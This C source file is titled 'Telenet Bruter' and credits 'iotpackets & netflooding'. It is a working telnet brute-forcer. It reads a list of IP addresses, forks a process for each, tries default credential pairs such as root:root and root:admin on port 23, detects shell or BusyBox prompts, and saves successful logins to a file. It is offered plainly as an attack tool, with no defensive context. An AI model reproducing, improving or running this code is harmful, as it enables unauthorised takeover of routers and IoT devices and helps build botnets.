Telenet Bruter

1.  
2. /*
3. Shitty telnet bruter by iotpackets & netflooding
4. */
5.  
6. #include <stdio.h>
7. #include <stdlib.h>
8. #include <stdarg.h>
9. #include <string.h>
10. #include <fcntl.h>
11. #include <errno.h>
12. #include <sys/socket.h>
13. #include <sys/time.h>
14. #include <sys/types.h>
15. #include <ctype.h>
16. #include <netinet/in.h>
17. #include <arpa/inet.h>
18. #include <net/if.h>
19. #include <netinet/ip.h>
20. #include <netinet/tcp.h>
21.  
22. int Timeout;
23. int port = 23; // change if u want to use a this bruter for other devices or telnet on a diff port
24. int statement;
25. char buf[1024];
26. char combo[60];
27. char *combos[] = {"root:root", "default:", "root:default", "root:admin", "bin:"}; // the more combos the slower scanner will be on its target lol
28.  
29. #define combo_size (sizeof(combos) / sizeof(unsigned char *))
30. #define SUCCESS "(\x1b[32m%s\x1b[37m:\x1b[32m%d\x1b[37m)"
31. #define FAILED "(\x1b[31m%s\x1b[37m:\x1b[31m%d\x1b[37m)"
32. #define INFO "(\x1b[33m%s\x1b[37m:\x1b[33m%d\x1b[37m)"
33.  
34. void Trim(char *str)
35. {
36. int i;
37. int begin = 0;
38. int end = strlen(str) - 1;
39. while (isspace(str[begin])) begin++;
40. while ((end >= begin) && isspace(str[end])) end--;
41. for (i = begin; i <= end; i++) str[i - begin] = str[i];
42. str[i - begin] = '\0';
43. }
44.  
45. void brute(char *target)
46. {
47. int Read;
48. int c = 0;
49. int Socket;
50. char cmd[70];
51. statement = 0;
52. char buffer[1024];
53. struct sockaddr_in sock;
54. struct timeval timeout;
55. char *username;
56. char password[40];
57. char username2[25];
58. char password2[44];
59. s:
60. switch(statement)
61. {
62. case 0:
63. {
64. if(c > combo_size)
65. goto end;
66. timeout.tv_sec = Timeout;
67. timeout.tv_usec = 0;
68. if(!(Socket = socket(AF_INET, SOCK_STREAM, 0)))
69. return;
70. setsockopt(Socket, SOL_SOCKET, SO_RCVTIMEO, (char *)&timeout, sizeof(timeout));
71. setsockopt(Socket, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout));
72. sock.sin_family = AF_INET;
73. sock.sin_port = htons(port);
74. sock.sin_addr.s_addr = inet_addr(target);
75. if(connect(Socket, (struct sockaddr *)&sock, sizeof(sock)) == -1)
76. {
77. statement = 0;
78. goto end;
79. }
80. //else
81. //printf(SUCCESS" Connected!\n", target, port);
82. statement += 1;
83. goto s;
84. }
85. break;
86.  
87. case 1:
88. {
89. snprintf(combo, sizeof(combo), "%s", combos[c]);
90. if(combo == NULL || combo == " " || combo == "(null)")
91. goto end;
92. username = strtok(combo, ":");
93. snprintf(password, sizeof(password), "%s", username+strlen(username)+1);
94. snprintf(username2, sizeof(username2), "%s\r\n", username);
95. snprintf(password2, sizeof(password2), "%s\r\n", password);
96.  
97. //printf(INFO" Trying Combo -> %s:%s\n", target, port, username, password);
98. while(Read = read(Socket, buffer, 1024))
99. {
100. buffer[Read] = '\0';
101. if(strstr(buffer, "ogin"))
102. {
103. //printf(SUCCESS" Found login prompt!\n", target, port);
104. goto send_user;
105. }
106. }
107. send_user:
108. if(send(Socket, username2, strlen(username2), 0))
109. {
110. //printf(SUCCESS" Sent username %s!\n", target, port, username);
111. while(Read = read(Socket, buffer, 1024))
112. {
113. buffer[Read] = '\0';
114. if(strstr(buffer, "ailed") || strstr(buffer, "ncorrect") || strstr(buffer, "rong"))
115. {
116. //printf(FAILED" Incorrect username...\n", target, port);
117. c += 1;
118. close(Socket);
119. statement = 0;
120. goto s;
121. }
122. else if(strstr(buffer, "@") || strstr(buffer, "#") || strstr(buffer, "$") || strstr(buffer, "%") || strstr(buffer, "elcome") || strstr(buffer, "usybox") || strstr(buffer, "usyBox") || strstr(buffer, ">") || strstr(buffer, "ONT"))
123. {
124. printf(SUCCESS" Successful login with no password -> %s\n", target, port, username);
125. snprintf(cmd, sizeof(cmd), "echo '%s:%d %s:%s' >> active_telnet", target, port, username, password); // too lazy to write to file
126. system(cmd);
127. goto end;
128. }
129. else if(strstr(buffer, "assword"))
130. {
131. //printf(SUCCESS" Found password prompt!\n", target, port);
132. goto send_pw;
133. }
134. }
135. send_pw:
136. if(send(Socket, password2, strlen(password2), 0))
137. {
138. //printf(SUCCESS" Sent password %s!\n", target, port, password);
139. while(Read = read(Socket, buffer, 1024))
140. {
141. buffer[Read] = '\0';
142. if(strstr(buffer, "ailed") || strstr(buffer, "ncorrect") || strstr(buffer, "rong"))
143. {
144. //printf(FAILED" Incorrect credentials...\n", target, port);
145. c += 1;
146. close(Socket);
147. statement = 0;
148. goto s;
149. }
150. else if(strstr(buffer, "@") || strstr(buffer, "#") || strstr(buffer, "$") || strstr(buffer, "%") || strstr(buffer, "elcome") || strstr(buffer, "usybox") || strstr(buffer, "usyBox") || strstr(buffer, ">") || strstr(buffer, "ONT"))
151. {
152. printf(SUCCESS" Successful login -> %s:%s\n", target, port, username, password);
153. snprintf(cmd, sizeof(cmd), "echo '%s:%d %s:%s' >> active_telnet", target, port, username, password); // too lazy to write to file
154. system(cmd);
155. goto end;
156. }
157. }
158. }
159. }
160. }
161. break;
162. }
163. end:
164. c = 0;
165. statement = 0;
166. close(Socket);
167. return;
168. }
169.  
170. int main(int argc, char **argv)
171. {
172. if(argc < 3 || argc > 3)
173. {
174. printf("[\x1b[31m-\x1b[37m] Usage: %s <timeout> <list>\n", argv[0]);
175. exit(0);
176. }
177. Timeout = atoi(argv[1]);
178. FILE *vuln_list = fopen(argv[2], "r");
179. if(vuln_list == NULL)
180. {
181. printf("[\x1b[31m-\x1b[37m] Failed to open given list (\x1b[33m%s\x1b[37m)\n", argv[2]);
182. exit(0);
183. }
184. while(fgets(buf, sizeof(buf) - 1, vuln_list))
185. {
186. if(strlen(buf) < 3 || buf == NULL)
187. break;
188. Trim(buf);
189. if(!(fork()))
190. {
191. brute(buf);
192. exit(0);
193. }
194. }
195. return;
196. }